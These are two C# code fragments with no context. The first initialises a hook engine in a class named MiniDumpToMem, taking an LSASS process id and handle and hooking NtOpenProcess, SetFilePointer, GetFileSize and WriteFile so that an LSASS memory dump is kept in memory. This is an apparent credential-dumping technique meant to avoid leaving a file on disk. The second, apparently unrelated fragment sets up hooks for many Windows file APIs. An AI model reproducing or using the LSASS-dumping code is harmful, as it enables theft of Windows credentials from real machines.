internal static void InitHookEngine(IntPtr contextHandle, uint dumpSizeLimit, int lsassPid, IntPtr lsassHandle) { hookEngine = new HookEngine(); dumpContexts[contextHandle] = new DumpContext(dumpSizeLimit); MiniDumpToMem.lsassPid = lsassPid; MiniDumpToMem.lsassHandle = lsassHandle; SetFilePointer_detour = new SetFilePointerDelegate(SetFilePointer); GetFileSize_detour = new GetFileSizeDelegate(GetFileSize); WriteFile_detour = new WriteFileDelegate(WriteFile); NtOpenProcess_detour = new NtOpenProcessDelegate(NtOpenProcess); NtOpenProcess_orig = hookEngine.CreateHook("ntdll.dll", "NtOpenProcess", NtOpenProcess_detour); SetFilePointer_orig = hookEngine.CreateHook("kernelbase.dll", "SetFilePointer", SetFilePointer_detour); GetFileSize_orig = hookEngine.CreateHook("kernelbase.dll", "GetFileSize", GetFileSize_detour); WriteFile_orig = hookEngine.CreateHook("kernelbase.dll", "WriteFile", WriteFile_detour); hookEngine.EnableHooks(); }
private void InitializeDelegates() { _createFileDelegate = new CreateFileADelegate(CreateFileHook); _createDirectoryDelegate = new CreateDirectoryDelegate(CreateDirectoryHook); _deleteFileDelegate = new DeleteFileDelegate(DeleteFileHook); _removeDirectoryDelegate = new RemoveDirectoryDelegate(RemoveDirectoryHook); _moveFileDelegate = new MoveFileDelegate(MoveFileHook); _readFileDelegate = new ReadFileDelegate(ReadFileHook); _closeHandleDelegate = new CloseHandleDelegate(CloseHandleHook); _getFileAttributesDelegate = new GetFileAttributesDelegate(GetFileAttributesHook); _getFileTypeDelegate = new GetFileTypeDelegate(GetFileTypeHook); _setFilePointerDelegate = new SetFilePointerDelegate(SetFilePointerHook); _getFileInformationByHandleDelegate = new GetFileInformationByHandleDelegate(GetFileInformationByHandleHook); _setEndOfFileDelegate = new SetEndOfFileDelegate(SetEndOfFileHook); _findFirstFile = new FindFirstFile(FindFirstFileHook); _findNextFile = new FindNextFile(FindNextFileHook); _findClose = new FindClose(FindCloseHook); _tioPathAdd = new TioPathAdd(TioPathAddHook); }